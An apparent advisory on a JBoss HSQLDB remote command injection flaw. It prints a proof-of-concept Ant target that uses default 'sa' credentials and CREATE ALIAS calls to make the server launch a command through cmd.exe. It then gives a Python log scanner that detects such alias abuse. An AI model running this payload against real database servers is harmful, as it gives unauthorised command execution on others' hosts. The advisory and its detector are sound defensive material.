JBoss HSQLDB Remote Command Injection Vulnerability
The researchers who discovered this vulnerability have developed a working exploit that is not publicly available or known to be circulating in the wild. The following proof of concept is available:

<target name="cmdinject">
  <sql classpath="hsqldb.jar"
       driver="org.hsqldb.jdbcDriver"
       url="jdbc:hsqldb:hsql://${host}:${port}"
       userid="sa"
       password=""
       print="true">
    CREATE ALIAS COMPDEBUG FOR "org.apache.xml.utils.synthetic.JavaUtils.setDebug"
    CREATE ALIAS SETPROP FOR "java.lang.System.setProperty";
    CREATE ALIAS COMPILE FOR "org.apache.xml.utils.synthetic.JavaUtils.JDKcompile";
    CALL COMPDEBUG(true);
    CALL SETPROP('org.apache.xml.utils.synthetic.javac','cmd.exe');
    CALL COMPILE('/c REGEDIT.EXE','');
  </sql>
</target>
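As an added defender-side example (not part of this advisory and not code from JBoss or HSQLDB), the following Python scans an application-side query log for the pattern the proof of concept above relies on: a CREATE ALIAS that binds a SQL name to a Java static method outside an allowlist, followed by a CALL of that alias. The log line format, the allowlist prefix (org.hsqldb.Library, assumed here to be the only class the application legitimately exposes) and the sample log lines are all assumptions constructed for this example.

```python
import re

# Constructed sample of an application-side query log for an HSQLDB
# instance. The "timestamp user statement" layout is an assumption for
# this example; the lines are made up, not captured from a real system.
SAMPLE_LOG = """\
2004-01-01 10:00:01 sa SELECT COUNT(*) FROM JMS_MESSAGES
2004-01-01 10:00:02 sa CREATE ALIAS ABS2 FOR "org.hsqldb.Library.abs"
2004-01-01 10:00:03 sa CREATE ALIAS SETPROP FOR "java.lang.System.setProperty"
2004-01-01 10:00:04 sa CALL SETPROP('org.apache.xml.utils.synthetic.javac','cmd.exe')
2004-01-01 10:00:05 sa CREATE ALIAS COMPDEBUG FOR "org.apache.xml.utils.synthetic.JavaUtils.setDebug"
2004-01-01 10:00:06 sa CALL ABS2(-1)
"""

# Assumed allowlist: class-name prefixes whose static methods the
# application legitimately exposes through CREATE ALIAS. Anything else
# (java.lang.System, the Xalan synthetic compiler helper, ...) is flagged.
ALLOWED_PREFIXES = ("org.hsqldb.Library.",)

ALIAS_RE = re.compile(r'\bCREATE\s+ALIAS\s+(\w+)\s+FOR\s+"([^"]+)"', re.IGNORECASE)
CALL_RE = re.compile(r'\bCALL\s+(\w+)\s*\(', re.IGNORECASE)


def audit_hsqldb_log(text, allowed_prefixes=ALLOWED_PREFIXES):
    """Return a list of (kind, alias, java_target, line_no) findings.

    kind is "ALIAS" when a CREATE ALIAS binds a name to a Java method
    outside the allowlist, and "CALL" when such an alias is later invoked.
    Alias names are compared case-insensitively, as HSQLDB does for
    unquoted identifiers.
    """
    suspicious = {}   # alias name (upper-cased) -> Java method it points at
    findings = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        m = ALIAS_RE.search(line)
        if m:
            alias, target = m.group(1).upper(), m.group(2)
            if not target.startswith(allowed_prefixes):
                suspicious[alias] = target
                findings.append(("ALIAS", alias, target, line_no))
            continue
        m = CALL_RE.search(line)
        if m and m.group(1).upper() in suspicious:
            alias = m.group(1).upper()
            findings.append(("CALL", alias, suspicious[alias], line_no))
    return findings


if __name__ == "__main__":
    for kind, alias, target, line_no in audit_hsqldb_log(SAMPLE_LOG):
        print(f"line {line_no}: {kind} {alias} -> {target}")
```

Run against the constructed log, the scan reports the SETPROP alias, its CALL, and the COMPDEBUG alias, while the allowlisted ABS2 alias and its call pass silently. The same check can be run against the HSQLDB server's own SQL log or a JDBC proxy log; the key signal is any alias whose Java target is not a function class the application deliberately publishes.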